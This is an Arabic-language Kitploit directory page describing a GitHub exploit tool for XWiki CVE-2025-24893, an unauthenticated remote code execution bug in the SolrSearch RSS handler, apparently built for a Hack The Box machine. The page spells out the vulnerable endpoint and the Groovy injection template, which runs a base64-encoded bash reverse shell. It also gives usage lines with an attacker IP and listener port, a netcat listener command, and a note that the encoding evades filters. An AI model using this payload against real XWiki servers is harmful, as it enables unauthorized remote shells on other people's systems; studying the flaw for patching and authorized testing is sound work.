Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
xwiki-cve-2025-24893-exploit — استغلال RCE غير مصادق عليه لـ XWiki CVE-2025-24893 عبر حقن سكريبت Groovy | Kitploit
أدوات/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

استغلال RCE غير مصادق عليه لـ XWiki CVE-2025-24893 عبر حقن سكريبت Groovy

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد
مشاركة

استغلال ثغرة XWiki CVE-2025-24893

أداة استغلال لتنفيذ التعليمات البرمجية عن بعد دون مصادقة لإصدارات XWiki المتأثرة بـ CVE-2025-24893.

نظرة عامة على الثغرة

إصدارات XWiki قبل 15.10.9 معرضة لثغرة تنفيذ أوامر عن بعد دون مصادقة عبر حقن سكربتات Groovy في معالج RSS الخاص بـ SolrSearch. توجد الثغرة لأن XWiki يفشل في تعقيم إدخال المستخدم بشكل صحيح في الوسيط text، مما يسمح للمهاجمين بالخروج من سياق RSS وحقن كود Groovy عشوائي.

معرف CVE: CVE-2025-24893
نقاط CVSS: 9.8 (حرجة)
الإصدارات المتأثرة: XWiki < 15.10.9

الميزات

  • واجهة سطر أوامر بسيطة
  • توليد الحمولة وتشفيرها تلقائياً
  • شل عكسي مشفر بـ Base64 لتجاوز المرشحات الأساسية
  • اعتماديات قليلة (مكتبة requests فقط)

المتطلبات

pip3 install requests

الاستخدام

python3 exploit.py <target_url> <attacker_ip> <listener_port>

مثال:

# Start listener on attacker machine
nc -lvnp 9001

# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

آلية العمل

  1. بناء أمر شل عكسي bash
  2. تشفير الحمولة باستخدام Base64
  3. تغليفها في كود Groovy باستخدام حقن القوالب (}}}}}}{{{{groovy}}}})
  4. تشفير الحمولة URL مع الحفاظ على المحددات الضرورية
  5. إرسال طلب GET إلى /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>
  6. يقوم XWiki بمعالجة تغذية RSS الخبيثة وتنفيذ كود Groovy

إثبات المفهوم

يستهدف الاستغلال النقطة التالية:

/xwiki/bin/get/Main/SolrSearch?media=rss&text=

تسمح الثغرة بالخروج من سياق تغذية RSS:

}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر يسببه هذا البرنامج. استخدم هذا الاستغلال فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

المراجع

  • تنبيه أمان XWiki
  • CVE-2025-24893

الترخيص

رخصة MIT - انظر ملف LICENSE للتفاصيل

المؤلف

أُنشئ لصندوق HTB "Editor"


ملاحظة: تأكد دائمًا من الحصول على التصريح المناسب قبل اختبار أي أنظمة.

تنزيل الأداة